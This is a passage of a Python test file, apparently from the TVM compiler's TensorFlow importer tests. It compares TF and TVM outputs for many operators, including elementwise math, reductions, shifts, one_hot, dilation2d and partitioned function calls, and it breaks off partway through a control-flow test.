        (tf.cos, 1, 5),
        (tf.tan, 1, 5),
        (tf.tanh, 1, 5),
        (tf.erf, 1, 5),
        (tf.log, 1, 5),
        (tf.log1p, 1, 5),
    ):
        _check(op, lo, hi)
def test_forward_atan2():
    """test operator Atan2"""
    tf.disable_eager_execution()
    lhs_values = np.random.uniform(1, 100, size=(2, 3, 5)).astype(np.float32)
    rhs_values = np.random.uniform(1, 100, size=(2, 3, 5)).astype(np.float32)
    tf.reset_default_graph()
    lhs = tf.placeholder(tf.float32, (2, 3, 5), name="in_data_1")
    rhs = tf.placeholder(tf.float32, (2, 3, 5), name="in_data_2")
    tf.atan2(lhs, rhs, name="atan2")
    compare_tf_with_tvm([lhs_values, rhs_values], ["in_data_1:0", "in_data_2:0"], "atan2:0")
def test_forward_expm1():
    """test operator Expm1 over several input ranks"""

    def _run(shape):
        tf.disable_eager_execution()
        data = np.random.uniform(1, 10, size=shape).astype(np.float32)
        tf.reset_default_graph()
        placeholder = tf.placeholder(tf.float32, shape, name="in_data")
        tf.expm1(placeholder, name="expm1")
        compare_tf_with_tvm([data], ["in_data:0"], "expm1:0")

    for shape in ([1, 100], [1, 10, 10], [2, 5, 2, 5]):
        _run(shape)
def test_forward_softsign():
    """test operator Softsign over several input ranks"""

    def _run(shape):
        tf.disable_eager_execution()
        data = np.random.uniform(1, 100, size=shape).astype(np.float32)
        tf.reset_default_graph()
        placeholder = tf.placeholder(tf.float32, shape, name="in_data")
        tf.nn.softsign(placeholder, name="softsign")
        compare_tf_with_tvm([data], ["in_data:0"], "softsign:0")

    for shape in ([1, 100], [1, 10, 10], [2, 5, 2, 5]):
        _run(shape)
def test_forward_rint():
    """test operator Rint over several input ranks"""

    def _run(shape):
        tf.disable_eager_execution()
        data = np.random.uniform(-100, 100, size=shape).astype(np.float32)
        tf.reset_default_graph()
        placeholder = tf.placeholder(tf.float32, shape, name="in_data")
        tf.math.rint(placeholder, name="rint")
        compare_tf_with_tvm([data], ["in_data:0"], "rint:0")

    for shape in ([100], [1, 100], [1, 10, 10], [2, 5, 2, 5]):
        _run(shape)
def test_forward_negative():
    """Elementwise Neg must round-trip through the importer."""
    data = np.random.uniform(-100, 255, size=(224, 224, 3)).astype(np.float32)
    tf.reset_default_graph()
    with tf.Graph().as_default():
        placeholder = tf.placeholder(tf.float32, (224, 224, 3), name="in_data")
        tf.negative(placeholder, name="negative")
        compare_tf_with_tvm([data], ["in_data:0"], "negative:0")
def test_forward_log_softmax():
    """LogSoftmax must round-trip through the importer."""
    data = np.random.uniform(1, 100, size=(9, 11)).astype(np.float32)
    tf.reset_default_graph()
    with tf.Graph().as_default():
        placeholder = tf.placeholder(tf.float32, (9, 11), name="in_data")
        tf.math.log_softmax(placeholder, name="LogSoftmax")
        compare_tf_with_tvm([data], ["in_data:0"], "LogSoftmax:0")
def test_forward_softplus():
    """Softplus must round-trip through the importer."""
    data = np.random.uniform(1, 10, size=(2, 3, 5)).astype(np.float32)
    tf.reset_default_graph()
    with tf.Graph().as_default():
        placeholder = tf.placeholder(tf.float32, (2, 3, 5), name="in_data")
        tf.nn.softplus(placeholder, name="softplus")
        compare_tf_with_tvm([data], ["in_data:0"], "softplus:0")
def test_forward_rsqrt():
    """Rsqrt on positive input must round-trip through the importer."""
    data = np.random.uniform(1, 100, size=(5, 7, 11)).astype(np.float32)
    tf.reset_default_graph()
    with tf.Graph().as_default():
        placeholder = tf.placeholder(tf.float32, (5, 7, 11), name="in_data")
        tf.rsqrt(placeholder, name="rsqrt")
        compare_tf_with_tvm([data], ["in_data:0"], "rsqrt:0")
def test_forward_sqrt():
    """Sqrt on positive input must round-trip through the importer."""
    data = np.random.uniform(1, 100, size=(5, 7, 11)).astype(np.float32)
    tf.reset_default_graph()
    with tf.Graph().as_default():
        placeholder = tf.placeholder(tf.float32, (5, 7, 11), name="in_data")
        tf.sqrt(placeholder, name="sqrt")
        compare_tf_with_tvm([data], ["in_data:0"], "sqrt:0")
def _test_forward_right_shift(in_shape, dtype):
    """Compare bitwise RightShift for one shape/dtype against TVM."""
    lhs_values = np.random.randint(1, 3, size=in_shape).astype(dtype)
    rhs_values = np.random.randint(1, 8, size=in_shape).astype(dtype)
    tf.reset_default_graph()
    with tf.Graph().as_default():
        lhs = tf.placeholder(dtype, in_shape, name="lft_data")
        rhs = tf.placeholder(dtype, in_shape, name="rgt_data")
        tf.bitwise.right_shift(lhs, rhs, name="RightShift")
        compare_tf_with_tvm([lhs_values, rhs_values], ["lft_data:0", "rgt_data:0"], "RightShift:0")
def test_forward_right_shift():
    """RightShift for 1-D int32 and 2-D int16 inputs."""
    for shape, dtype in (((7,), "int32"), ((3, 11), "int16")):
        _test_forward_right_shift(shape, dtype)
def _test_forward_left_shift(in_shape, dtype):
    """Compare bitwise LeftShift for one shape/dtype against TVM."""
    lhs_values = np.random.randint(100, 1000000, size=in_shape).astype(dtype)
    rhs_values = np.random.randint(1, 3, size=in_shape).astype(dtype)
    tf.reset_default_graph()
    with tf.Graph().as_default():
        lhs = tf.placeholder(dtype, in_shape, name="lft_data")
        rhs = tf.placeholder(dtype, in_shape, name="rgt_data")
        tf.bitwise.left_shift(lhs, rhs, name="LeftShift")
        compare_tf_with_tvm([lhs_values, rhs_values], ["lft_data:0", "rgt_data:0"], "LeftShift:0")
def test_forward_left_shift():
    """LeftShift for 1-D int32 and 3-D int16 inputs."""
    for shape, dtype in (((10,), "int32"), ((224, 224, 3), "int16")):
        _test_forward_left_shift(shape, dtype)
#######################################################################
# Mean
# ----
def test_forward_mean():
    """Mean reduction, with and without explicit axes and keepdims."""

    def check_mean(ishape, **kwargs):
        data = np.random.uniform(size=ishape).astype(np.float32)
        with tf.Graph().as_default():
            placeholder = tf.placeholder(shape=data.shape, dtype=data.dtype)
            tf.keras.backend.mean(placeholder, **kwargs)
            compare_tf_with_tvm(data, "Placeholder:0", "Mean:0", no_gpu=True)

    check_mean((10, 8, 16, 32))
    check_mean((10, 8, 16, 32), axis=(2, 3))
    check_mean((10, 8, 16, 32), axis=(1, 2), keepdims=True)
#######################################################################
# Size
# ----
def test_forward_size():
    """test Size operator (total element count of the input tensor)."""

    def check_size(ishape):
        np_input = np.random.uniform(size=ishape).astype(np.float32)
        # if all dimensions are constant, TF will optimize away size operator
        # into constant, so keep the leading dimension dynamic
        tf_input_shape = list(np_input.shape)
        tf_input_shape[0] = None
        with tf.Graph().as_default():
            # renamed from `input`, which shadowed the builtin
            in_data = tf.placeholder(shape=tf_input_shape, dtype=np_input.dtype, name="input")
            tf.size(in_data, name="size")
            compare_tf_with_tvm([np_input], ["input:0"], "size:0")

    check_size((10, 8, 16, 32))
    check_size((10,))
#######################################################################
# All, Any, Max, Min, Prod, variance, std, logsumexp, euclidean_norm
# ------------------------------------------------------------------
def test_forward_reduce():
    """All/Any/Max/Min/Prod/variance/std/logsumexp/euclidean_norm reductions."""

    def _check_op(tf_op, ishape, axis, keepdims, dtype="float32"):
        tf.reset_default_graph()
        if dtype == "bool":
            np_data = np.random.choice([True, False], size=ishape)
        else:
            np_data = np.random.uniform(size=ishape).astype(dtype)
        if tf_op == tf.math.reduce_prod:
            # NOTE: prod is exercised on a flattened input with a fixed axis
            # only — presumably to keep the product well-behaved; confirm
            # before widening.
            axis = 1
            np_data = np_data.reshape(1, -1)
        with tf.Graph().as_default():
            in_data = tf.placeholder(dtype, name="in_data")
            reduce_op = tf_op(in_data, axis=axis, keepdims=keepdims, name="reduce_std")
            compare_tf_with_tvm([np_data], ["in_data:0"], reduce_op.name)

    def _test_math_op(op, dtypes=("int32", "float32")):
        # tuple default instead of a mutable list default argument
        for dtype in dtypes:
            _check_op(op, (3, 10), axis=(-1), keepdims=False, dtype=dtype)
            _check_op(op, (8, 16, 32), axis=(-1), keepdims=False, dtype=dtype)
            _check_op(op, (1, 8, 8, 3), axis=(2, 3), keepdims=True, dtype=dtype)
            _check_op(op, (2, 3, 10, 10), axis=(1, 2), keepdims=True, dtype=dtype)

    _test_math_op(tf.math.reduce_all, dtypes=["bool"])
    _test_math_op(tf.math.reduce_any, dtypes=["bool"])
    _test_math_op(tf.math.reduce_max)
    _test_math_op(tf.math.reduce_min)
    _test_math_op(tf.math.reduce_prod)
    _test_math_op(tf.math.reduce_variance, dtypes=["float32"])
    _test_math_op(tf.math.reduce_std, dtypes=["float32"])
    _test_math_op(tf.math.reduce_logsumexp, dtypes=["float32"])
    # reduce_euclidean_norm only exists from TF 1.15 on.
    if package_version.parse(tf.VERSION) >= package_version.parse("1.15.0"):
        _test_math_op(tf.math.reduce_euclidean_norm)
#######################################################################
# All, Max, Min
# ------------------------------------------------------------------
def test_forward_raw_reduce():
    """Raw-op All/Max/Min reductions, including axes given via tf.range."""

    def _check_op(tf_op, ishape, axis, keepdims, range_axis=False, dtype="float32"):
        tf.reset_default_graph()
        if dtype == "bool":
            np_data = np.random.choice([True, False], size=ishape)
        else:
            np_data = np.random.uniform(size=ishape).astype(dtype)
        if tf_op == tf.math.reduce_prod:
            # NOTE: prod is exercised on a flattened input with a fixed axis
            # only — presumably to keep the product well-behaved; confirm
            # before widening.
            axis = 1
            np_data = np_data.reshape(1, -1)
        with tf.Graph().as_default():
            if range_axis:
                # Build the reduction axes as an in-graph tf.range tensor.
                axis = tf.range(axis[0], axis[1], axis[2], name="range", dtype="int32")
            in_data = tf.placeholder(dtype, name="in_data")
            reduce_op = tf_op(input=in_data, axis=axis, keep_dims=keepdims, name="reduce_std")
            compare_tf_with_tvm([np_data], ["in_data:0"], reduce_op.name)

    def _test_raw_reduce_op(op, dtypes=("int32", "float32")):
        # tuple default instead of a mutable list default argument
        for dtype in dtypes:
            _check_op(op, (3, 10), axis=(-1), keepdims=False, dtype=dtype)
            _check_op(op, (8, 16, 32), axis=(-1), keepdims=False, dtype=dtype)
            _check_op(op, (1, 8, 8, 3), axis=(2, 3), keepdims=True, dtype=dtype)
            _check_op(op, (2, 3, 10, 10), axis=(1, 2), keepdims=True, dtype=dtype)
            _check_op(op, (1, 8, 8, 3), axis=(2, 4, 1), keepdims=True, range_axis=True, dtype=dtype)
            _check_op(
                op, (2, 3, 10, 10), axis=(1, 3, 1), keepdims=True, range_axis=True, dtype=dtype
            )

    # tf.raw_ops reductions are only exposed from TF 2.4.1 on.
    if package_version.parse(tf.VERSION) >= package_version.parse("2.4.1"):
        _test_raw_reduce_op(tf.raw_ops.All, dtypes=["bool"])
        _test_raw_reduce_op(tf.raw_ops.Max)
        _test_raw_reduce_op(tf.raw_ops.Min)
#######################################################################
# Relational operators
# --------------------
def _test_forward_rel_op(data, func):
    """Compare one relational op (cast to int32) against TVM."""
    with tf.Graph().as_default():
        lhs = tf.placeholder(shape=data[0].shape, dtype=data[0].dtype, name="in1")
        rhs = tf.placeholder(shape=data[1].shape, dtype=data[1].dtype, name="in2")
        relational = func(lhs, rhs, name="op")
        # Cast the boolean result so the comparison runs on int32 tensors.
        tf.cast(relational, tf.int32, name="out1")
        compare_tf_with_tvm([data[0], data[1]], ["in1:0", "in2:0"], "out1:0")
def test_forward_rel_ops():
    """All six relational operators on a pair of 3x3 matrices."""
    t1 = np.array([[1, 2, 3], [4, 5, 6], [7, 8, 9]])
    t2 = np.array([[9, 8, 7], [6, 5, 4], [3, 2, 1]])
    for relation in (
        math_ops.less,
        math_ops.greater,
        math_ops.less_equal,
        math_ops.greater_equal,
        math_ops.equal,
        math_ops.not_equal,
    ):
        _test_forward_rel_op([t1, t2], relation)
#######################################################################
# ExpandDims
# ----------
def _test_forward_expand_dims(data, axis):
    """Compare tf.expand_dims at one axis against TVM."""
    with tf.Graph().as_default():
        placeholder = tf.placeholder(shape=data.shape, dtype=data.dtype, name="in1")
        expanded = tf.expand_dims(placeholder, axis)
        compare_tf_with_tvm([data], [placeholder.name], expanded.name)
def test_forward_expand_dims():
    """ExpandDims on scalar, 1-D and 2-D inputs, positive and negative axes."""
    for data, axis in (
        (np.int32(1), 0),
        (np.array([1]), 0),
        (np.array([1]), -1),
        (np.array([[1], [2]]), 0),
        (np.array([[1], [2]]), 1),
        (np.array([[1], [2]]), -1),
    ):
        _test_forward_expand_dims(data, axis)
#######################################################################
# Maximum, Minimum
# ----------------
def test_forward_maximum():
    """test Op Maximum, including a broadcast case."""

    def check_maximum(lh_shape, rh_shape, dtype):
        tf.reset_default_graph()
        lhs_values = np.random.uniform(size=lh_shape).astype(dtype)
        rhs_values = np.random.uniform(size=rh_shape).astype(dtype)
        with tf.Graph().as_default():
            lhs = tf.placeholder(dtype, name="lft_data")
            rhs = tf.placeholder(dtype, name="rgt_data")
            tf.math.maximum(lhs, rhs, name="maximum")
            compare_tf_with_tvm([lhs_values, rhs_values], ["lft_data:0", "rgt_data:0"], "maximum:0")

    check_maximum((10, 8, 16, 32), (1,), dtype="int32")
    check_maximum((10, 8, 16, 32), (10, 8, 16, 32), dtype="float32")
def test_forward_minimum():
    """test Op Minimum, including a broadcast case."""

    def check_minimum(lh_shape, rh_shape, dtype):
        tf.reset_default_graph()
        lhs_values = np.random.uniform(size=lh_shape).astype(dtype)
        rhs_values = np.random.uniform(size=rh_shape).astype(dtype)
        with tf.Graph().as_default():
            lhs = tf.placeholder(dtype, name="lft_data")
            rhs = tf.placeholder(dtype, name="rgt_data")
            tf.math.minimum(lhs, rhs, name="minimum")
            compare_tf_with_tvm([lhs_values, rhs_values], ["lft_data:0", "rgt_data:0"], "minimum:0")

    check_minimum((10, 8, 16, 32), (1,), dtype="int32")
    check_minimum((10, 8, 16, 32), (10, 8, 16, 32), dtype="float32")
#######################################################################
# PlaceholderWithDefault
# ----------------------
def test_placeholder():
    """PlaceholderWithDefault fed explicitly, mixed with a Variable and a Placeholder."""
    with tf.Graph().as_default():
        data1 = np.random.uniform(-5, 5, size=(3, 4, 5)).astype(np.float32)
        var1 = tf.Variable(data1, name="in1")
        var2 = array_ops.placeholder_with_default(var1, None, name="place1")
        data2 = np.random.uniform(-5, 5, size=(3, 4, 5)).astype(np.float32)
        place1 = array_ops.placeholder(shape=data1.shape, dtype=data1.dtype, name="in2")
        out1 = tf.math.add(var1, var2, name="out1")
        tf.math.add(out1, place1, name="out2")
        compare_tf_with_tvm(
            [data1, data2], ["place1:0", "in2:0"], "out2:0", init_global_variables=True
        )
#######################################################################
# OneHot
# ----------------------
def _test_forward_one_hot(indices_shape, depth, on_value, off_value, axis, out_dtype):
    """Compare tf.one_hot for one configuration against TVM."""
    indices = np.random.randint(0, 5, size=indices_shape)
    with tf.Graph().as_default():
        placeholder = tf.placeholder(shape=indices.shape, dtype=indices.dtype)
        encoded = tf.one_hot(placeholder, depth, on_value, off_value, axis, dtype=out_dtype)
        compare_tf_with_tvm(indices, placeholder.name, encoded.name)
def test_forward_one_hot():
    """OneHot over several ranks, axes, on/off values, and output dtypes."""
    for args in (
        ((3,), 3, 1, 0, -1, "int32"),
        ((3,), 3, 1.0, 0.0, -1, "float32"),
        ((2, 2), 5, 2, -2, 0, "int32"),
        ((2, 2), 5, 0.5, -0.5, 1, "float32"),
        ((3, 2, 4, 5), 6, 1, 0, 1, "int32"),
        ((3, 2, 4, 5), 6, 1.0, 0.0, 0, "float32"),
    ):
        _test_forward_one_hot(*args)
#######################################################################
# AddN
# ----------------------
def _test_forward_add_n(inputs):
    """Compare tf.add_n over the given sequence of tensors against TVM."""
    tf.reset_default_graph()
    with tf.Graph().as_default():
        placeholders = [
            tf.placeholder(shape=each.shape, dtype=each.dtype) for each in inputs
        ]
        total = tf.add_n(placeholders)
        compare_tf_with_tvm(list(inputs), [each.name for each in placeholders], total.name)
def test_forward_add_n():
    """AddN over singles, pairs and triples, in both int32 and float32."""
    x = np.random.randint(1, 100, size=(3, 3, 3), dtype=np.int32)
    y = np.random.randint(1, 100, size=(3, 3, 3), dtype=np.int32)
    z = np.random.randint(1, 100, size=(3, 3, 3), dtype=np.int32)
    m, n, o = x.astype(np.float32), y.astype(np.float32), z.astype(np.float32)
    # A bare ndarray iterates over its first axis, giving three 2-D addends.
    for case in (x, [x, y], (x, y, z), m, [m, n], (m, n, o)):
        _test_forward_add_n(case)
#######################################################################
# Sharing params case
# ----------------------
def test_sharing_node():
    """Test the sharing params case: two consumers of one constant axis."""
    data = np.random.uniform(size=(2, 2, 2)).astype("float32")
    with tf.Graph().as_default():
        placeholder = tf.placeholder(tf.float32, shape=(2, 2, 2), name="in_data")
        # Both reductions share the same axis constant node.
        shared_axis = tf.constant([-1], dtype=tf.int32, name="axis")
        mean0 = tf.reduce_mean(placeholder, axis=shared_axis, keepdims=False, name="mean0")
        mean1 = tf.reduce_mean(placeholder, axis=shared_axis, keepdims=False, name="mean1")
        tf.add(mean0, mean1, name="out")
        compare_tf_with_tvm([data], ["in_data:0"], "out:0")
#######################################################################
# Unravel Index
# ----------------------
def _test_forward_unravel_index(inputs):
    """Compare TF and TVM for unravel_index; *inputs* is [indices_array, dims_array]."""
    tf.reset_default_graph()
    with tf.Graph().as_default():
        temp = []
        for each in inputs:
            temp.append(tf.placeholder(shape=each.shape, dtype=each.dtype))
        output = tf.unravel_index(temp[0], temp[1])
        compare_tf_with_tvm([each for each in inputs], [each.name for each in temp], output.name)
def _test_forward_unravel_index_scalar(x, y, dtype="int32"):
    """unravel_index with a scalar index; operands are baked into the graph as constants."""
    tf.reset_default_graph()
    with tf.Graph().as_default():
        indices_1 = constant_op.constant(x, dtype=dtype)
        dims_1 = constant_op.constant(y, dtype=dtype)
        out_1 = array_ops.unravel_index(indices_1, dims_1)
        compare_tf_with_tvm([], [], out_1.name)
def test_forward_unravel_index():
    """UnravelIndex over vector indices of several sizes, plus a scalar case."""
    # (indices, dims) pairs, run in the original order.
    cases = [
        ([0, 1, 2, 3], [2, 2]),
        ([0, 1, 2, 5], [2, 3]),
        ([0, 1, 2, 5], [6]),
        ([102, 300, 16], [10, 10, 9, 6]),
        ([100], [10, 10, 9, 6]),
    ]
    for indices, dims in cases:
        _test_forward_unravel_index([np.array(indices), np.array(dims)])
    # Test scalar input
    _test_forward_unravel_index_scalar(13, [1, 4, 5, 2])
#######################################################################
# Dilation2d
# ----------------------
def _test_dilation2d(tensor_in_sizes, filter_in_sizes, strides, dilations, padding):
    """ One iteration of dilation2d with given shapes and attributes.

    The input placeholder and the Dilation2D op are referenced through their
    auto-generated graph names ("Placeholder:0" / "Dilation2D:0"), so no extra
    ops may be added to the graph.
    """
    total_size_1 = np.prod(tensor_in_sizes)
    total_size_2 = np.prod(filter_in_sizes)
    # Initializes the input tensor with array containing incrementing
    # numbers from 1.
    data_array = [f * 1.0 for f in range(1, total_size_1 + 1)]
    filter_array = [f * 1.0 for f in range(1, total_size_2 + 1)]
    with tf.Graph().as_default():
        in_data = array_ops.placeholder(shape=tensor_in_sizes, dtype="float32")
        in_filter = constant_op.constant(filter_array, shape=filter_in_sizes, dtype="float32")
        nn_ops.dilation2d(in_data, in_filter, strides=strides, rates=dilations, padding=padding)
        compare_tf_with_tvm(
            np.reshape(data_array, tensor_in_sizes).astype("float32"),
            "Placeholder:0",
            "Dilation2D:0",
            no_gpu=True,
        )
def test_forward_dilation():
    """Dilation2D over a spread of shapes, strides, rates and paddings."""
    # (input_shape, filter_shape, strides, rates, padding) — original order kept.
    cases = [
        ([1, 18, 18, 32], [4, 4, 32], [1, 1, 1, 1], [1, 2, 1, 1], "VALID"),
        ([1, 15, 15, 32], [4, 4, 32], [1, 1, 1, 1], [1, 2, 1, 1], "SAME"),
        ([1, 5, 5, 1], [2, 2, 1], [1, 1, 1, 1], [1, 1, 1, 1], "VALID"),
        ([1, 5, 5, 1], [3, 3, 1], [1, 1, 1, 1], [1, 2, 2, 1], "VALID"),
        ([1, 5, 5, 3], [3, 3, 3], [1, 1, 1, 1], [1, 1, 1, 1], "SAME"),
        ([1, 28, 28, 3], [5, 5, 3], [1, 2, 2, 1], [1, 1, 1, 1], "VALID"),
        ([1, 224, 224, 10], [8, 8, 10], [1, 1, 1, 1], [1, 1, 1, 1], "VALID"),
        ([1, 18, 18, 32], [4, 4, 32], [1, 1, 1, 1], [1, 2, 1, 1], "SAME"),
        ([1, 15, 15, 32], [4, 4, 32], [1, 1, 1, 1], [1, 2, 1, 1], "VALID"),
        ([1, 5, 5, 1], [7, 2, 1], [1, 3, 1, 1], [1, 1, 1, 1], "SAME"),
        ([1, 5, 5, 1], [3, 4, 1], [1, 2, 1, 1], [1, 2, 2, 1], "SAME"),
        ([1, 5, 5, 3], [3, 3, 3], [1, 1, 4, 1], [1, 1, 1, 1], "VALID"),
        ([1, 28, 28, 3], [5, 6, 3], [1, 1, 2, 1], [1, 1, 1, 1], "SAME"),
        ([1, 224, 224, 10], [8, 8, 10], [1, 3, 1, 1], [1, 1, 1, 1], "SAME"),
        ([1, 3, 3, 1], [2, 2, 1], [1, 1, 1, 1], [1, 2, 2, 1], "SAME"),
        ([1, 3, 3, 1], [2, 2, 1], [1, 1, 1, 1], [1, 1, 2, 1], "VALID"),
    ]
    for tensor_in, filt, strides, rates, padding in cases:
        _test_dilation2d(tensor_in, filt, strides, rates, padding)
def _test_identityn(data_np_list):
    """Feed each array in *data_np_list* through one IdentityN op and compare TF vs TVM."""
    with tf.Graph().as_default():
        data_tensors = []
        data_tensors_name = []
        for index, data_np in enumerate(data_np_list):
            tensor_name = f"data_{index}"
            data_tensors_name.append(tensor_name + ":0")
            data_tensors.append(
                tf.placeholder(shape=data_np.shape, dtype=str(data_np.dtype), name=tensor_name)
            )
        output = tf.identity_n(data_tensors)
        output_names = [out.name for out in output]
        compare_tf_with_tvm(
            data_np_list,
            data_tensors_name,
            output_names,
        )
@pytest.mark.parametrize(
    "data_np_list",
    [
        (
            [
                np.array([[1, 1], [0, 3], [0, 1], [2, 0], [3, 1]], dtype=np.int64),
                np.array([1, 2, 3, 4, 5], dtype=np.int64),
                np.array([5, 6], dtype=np.int64),
            ]
        ),
        (
            [
                np.array([[1, 1], [0, 3], [2, 0], [3, 1]], dtype=np.int64),
                np.array([1, 2, 3, 4], dtype=np.int64),
                np.array([5, 6], dtype=np.int64),
                np.array([True, False, True]),
            ]
        ),
        (
            [
                np.array([]),
                np.array([[]]),
            ]
        ),
    ],
)
def test_forward_identityn(data_np_list):
    """Parametrized IdentityN test: int64 bundles, a bool array, and empty arrays."""
    _test_identityn(data_np_list)
#######################################################################
# infinity ops
# ------------
def _verify_infiniteness_ops(tf_op, name):
    """Test an infiniteness operator (is_inf/is_finite/is_nan) for float32/float64.

    Half of the elements are overwritten with inf and, independently, half with
    nan so both special values are exercised in every run.
    """
    # Only float types are allowed in Tensorflow for isfinite and isinf
    # float16 is failing on cuda
    tf_dtypes = ["float32", "float64"]
    for tf_dtype in tf_dtypes:
        shape = (8, 8)
        data = np.random.uniform(size=shape).astype(tf_dtype)
        # np.infty was a deprecated alias removed in NumPy 2.0; np.inf is canonical.
        data.ravel()[np.random.choice(data.size, int(data.size * 0.5), replace=False)] = np.inf
        data.ravel()[np.random.choice(data.size, int(data.size * 0.5), replace=False)] = np.nan
        tf.reset_default_graph()
        in_data = tf.placeholder(tf_dtype, shape, name="in_data")
        tf_op(in_data, name=name)
        compare_tf_with_tvm([data], ["in_data:0"], "{}:0".format(name))
def test_forward_isinf():
    """test operator IsInf"""
    _verify_infiniteness_ops(tf.is_inf, "isinf")
def test_forward_isfinite():
    """test operator IsFinite"""
    _verify_infiniteness_ops(tf.is_finite, "isfinite")
def test_forward_isnan():
    """test operator IsNan"""
    _verify_infiniteness_ops(tf.is_nan, "isnan")
def _test_spop_placeholder_without_shape_info():
    """StatefulPartitionedCall fed by shape-less placeholders, plus a post-call add."""
    with tf.Graph().as_default():
        @function.Defun(*[tf.int32] * 2)
        def Forward(x, y):
            print(x.name)
            print(y.name)
            b = tf.add(x, y)
            return b
        pl1 = tf.placeholder(tf.int32, name="pl1")
        pl2 = tf.placeholder(tf.int32, name="pl2")
        pl3 = tf.placeholder(tf.int32, name="pl3")
        data = np.array([[-1, 1], [2, -2]], dtype=np.int32)
        data2 = np.array([[-2, 3], [4, -6]], dtype=np.int32)
        data3 = np.array([[-2, 3], [4, -6]], dtype=np.int32)
        z1 = gen_functional_ops.StatefulPartitionedCall(args=[pl1, pl2], Tout=[tf.int32], f=Forward)
        z2 = z1 + pl3
        compare_tf_with_tvm(
            [data, data2, data3],
            ["pl1:0", "pl2:0", "pl3:0"],
            ["StatefulPartitionedCall:0", z2.name],
            mode="vm",
            init_global_variables=True,
        )
def _test_spop_placeholder_with_shape_and_default_value():
    """placeholder_with_default (backed by a Variable) feeding a Defun call."""
    with tf.Graph().as_default():
        data = np.ones([1], dtype=int).astype(np.int32)
        dataVar = tf.Variable(data, shape=data.shape)
        pl1 = array_ops.placeholder_with_default(dataVar, shape=data.shape, name="pl1")
        tpl = tf.convert_to_tensor(pl1, dtype=tf.int32)
        @function.Defun(*[tf.int32])
        def pl_with_default(pl):
            return tf.expand_dims(tf.multiply(pl, pl), 0)
        z = gen_functional_ops.StatefulPartitionedCall(
            args=[tpl], Tout=[tf.int32], f=pl_with_default
        )
        compare_tf_with_tvm(
            data, ["pl1:0"], "StatefulPartitionedCall:0", mode="vm", init_global_variables=True
        )
def _test_spop_placeholder_numpy_arange_feed():
    """tf.function add over shaped placeholders fed with np.arange data."""
    with tf.Graph().as_default():
        t1 = tf.placeholder(tf.int32, (3, 3, 3), "t1")
        t1_data = np.arange(27, dtype=np.int32).reshape((3, 3, 3))
        t2 = tf.placeholder(tf.int32, (3, 3, 3), "t2")
        t2_data = np.arange(27, dtype=np.int32).reshape((3, 3, 3))
        @tf.function
        def add(x, y):
            return tf.add(x, y, "add_t1_t2")
        t3 = add(t1, t2)
        compare_tf_with_tvm(
            [t1_data, t2_data], ["t1:0", "t2:0"], [t3.name], mode="vm", init_global_variables=True
        )
def _test_spop_placeholder_numpy_array_feed():
    """tf.function add over shape-less placeholders fed with explicit numpy arrays."""
    with tf.Graph().as_default():
        t1_data = np.array([[-1, 1, 3], [2, -2, 4], [2, -3, 14]], dtype=np.int32)
        t2_data = np.array([[-2, 1, 2], [12, -2, 14], [12, -3, 4]], dtype=np.int32)
        t1 = tf.placeholder(tf.int32, name="t1")
        t2 = tf.placeholder(tf.int32, name="t2")
        @tf.function
        def add(x, y):
            return tf.add(x, y, "add_t1_t2")
        t3 = add(t1, t2)
        compare_tf_with_tvm(
            [t1_data, t2_data], ["t1:0", "t2:0"], [t3.name], mode="vm", init_global_variables=True
        )
def _test_spop_function_invocation_basic():
    """A tf.function calling two plain Python functions on constant inputs."""
    with tf.Graph().as_default():
        def fun1(a):
            return tf.multiply(a, a)
        def fun2(b):
            return tf.multiply(b, 10)
        @tf.function
        def fun3(x, y):
            x = fun2(x)
            y = fun1(y)
            z = tf.add(x, y)
            return z
        t3 = fun3(tf.constant(10.5), tf.constant(20.4))
        compare_tf_with_tvm([], [], [t3.name], mode="vm", init_global_variables=True)
def _test_spop_function_invocation_nested():
    """A tf.function invoking another tf.function several times (nested calls)."""
    with tf.Graph().as_default():
        t1 = tf.placeholder(tf.int32, (3, 3, 3), name="t1")
        t1_data = np.arange(27, dtype=np.int32).reshape((3, 3, 3))
        t2 = tf.placeholder(tf.int32, name="t2")
        t2_data = np.arange(27, dtype=np.int32).reshape((3, 3, 3))
        @tf.function
        def myfunc(x, y):
            return tf.add(x, y, "myfunc")
        @tf.function
        def myfunc2(x, y):
            z = myfunc(x, y)
            l = myfunc(z, y)
            m = myfunc(l, z)
            return tf.add(l, m, "myfunc2")
        res1 = myfunc(t1, t2)
        res2 = myfunc2(res1, t1)
        compare_tf_with_tvm(
            [t1_data, t2_data], ["t1:0", "t2:0"], [res2.name], mode="vm", init_global_variables=True
        )
def _test_spop_function_invocation_no_autograph():
    """Same as the basic invocation test, but the inner functions disable autograph."""
    with tf.Graph().as_default():
        @tf.function(autograph=False)
        def fun1(a):
            return tf.multiply(a, a)
        @tf.function(autograph=False)
        def fun2(b):
            return tf.multiply(b, 10)
        @tf.function
        def fun3(x, y):
            x = fun2(x)
            y = fun1(y)
            z = tf.add(x, y)
            return z
        t3 = fun3(tf.constant(10.5), tf.constant(20.4))
        compare_tf_with_tvm([], [], [t3.name], mode="vm", init_global_variables=True)
def _test_spop_function_invocation_defun():
    """Explicit function.Defun wrapped in a named StatefulPartitionedCall op."""
    with tf.Graph().as_default():
        def fun1(a):
            return tf.multiply(a, a)
        def fun2(b):
            return tf.multiply(b, b)
        @function.Defun(dtypes.float32, dtypes.float32, func_name="Fun3")
        def fun3(x, y):
            x = fun2(x)
            y = fun1(y)
            z = tf.add(x, y)
            return z
        op = gen_functional_ops.StatefulPartitionedCall(
            args=[tf.constant(10.5), tf.constant(20.4)],
            Tout=[dtypes.float32],
            f=fun3,
            name="SpopFnInvocation",
        )
        compare_tf_with_tvm([], [], "SpopFnInvocation:0", mode="vm", init_global_variables=True)
def _test_spop_arithmetic():
    """StatefulPartitionedCall computing m*x + c over int32 constants."""
    with tf.Graph().as_default():
        @function.Defun(*[dtypes.int32] * 3)
        def arithmetic(m, x, c):
            z = tf.add(tf.multiply(m, x), c)
            return z
        m = tf.constant(10)
        x = tf.constant(20)
        c = tf.constant(2)
        spopFn = gen_functional_ops.StatefulPartitionedCall(
            args=[m, x, c], Tout=[tf.int32], f=arithmetic
        )
        compare_tf_with_tvm(
            [], [], "StatefulPartitionedCall:0", mode="vm", init_global_variables=True
        )
def _test_spop_control_flow():
    """Python-level control flow (while/continue) inside a Defun body.

    The loop runs at graph-construction time, so only the final multiply
    survives in the traced graph.
    """
    with tf.Graph().as_default():
        @function.Defun(*[dtypes.float32] * 2)
        def Body1(x, y):
            with ops.device("/job:localhost/replica:0/task:0/device:CPU:0"):
                z = math_ops.multiply(x, y)
                i = 0
                while i < 10:
                    i += 1
                    if i == 5:
                        continue
